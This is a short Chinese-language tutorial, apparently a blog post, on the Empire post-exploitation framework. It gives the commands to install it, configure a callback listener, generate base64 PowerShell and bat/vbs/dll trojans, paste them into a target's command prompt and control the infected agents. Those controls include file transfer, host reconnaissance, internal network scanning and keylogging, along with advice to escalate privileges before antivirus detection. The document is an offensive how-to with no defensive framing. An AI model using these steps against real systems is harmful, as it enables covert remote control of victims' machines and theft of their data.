Empire- 後滲測試
Empire 後滲工具使用
- Empire後滲測試工具重點先說明這支持內網跨網也不行(可能可以公網連接沒測試);
- 這個工具主要原理通過Python建立一個http服務讓agent進行回調至目標
- Agent端目前只支持windows系統
下載工具
Github: https://github.com/EmpireProject/Empire
下載命令: git clone https://github.com/EmpireProject/Empire.git
安裝步驟
Empiresetup目錄執行install.sh文件
./install.sh 或者不行就 ./reset.sh
Tips: 您將獲得有關python的一些問題,實際上僅足夠下載此工具庫。
使用基本的工具步驟
展示界面
- 使用模塊使用
- 展示Listeners http模塊中的info
設置名稱: set Name door
設置端口: set Port 4447(自己本機代理監聽端口)
設置反彈地址: set Host 0.0.0.0 (也就是自己的地址)
執行生成好的代理: execute
- 接下來相當於設置payload(形成木馬,該木馬內容經過base64編譯但頭部沒有)
命令: launcher powershell door(只是你生成的代理名稱)
- 生成bat,vbs等木馬方法
命令:usetarger windows/dll
查看參數選項: info
Tips: 根據自己需求格式就如上命令所示選中在通過info進行設置相應的參數即可,生成的bat包運行後會自動消失。
客戶端操作流程
- 將生成好的base64木馬直接粘貼至cmd命令框中
- 服務端已監聽狀態顯示
命令: agents (顯示當前已成功監聽的client,如果監聽斷開連接如碰到關機斷網的情況下則出現紅色字眼)
3. 進入client客戶端
4. 控制客戶端命令(如:上傳,下載,查看主機信息,掃描內網存活主機)
Tips: 這些功能有些在使用的時候目標主機會報毒,所以儘可能在拿到shell情況下趕緊提權維持會話等操作,因爲這個工具目前好像只能提供展示的零時會話。進入客戶端也會有兩大常用模塊。
使用模塊命令: usemodule situational_awareness
Tips: 其實更多模塊可以參照其他博客(說實話其他的功能也沒什麼特別適用於真是環境的)
問題:
- 生成的木馬不能夠免殺 該工具已經停止維護。
- Client控制的時候很多模塊會報毒及記錄不穩定比如鍵盤記錄等…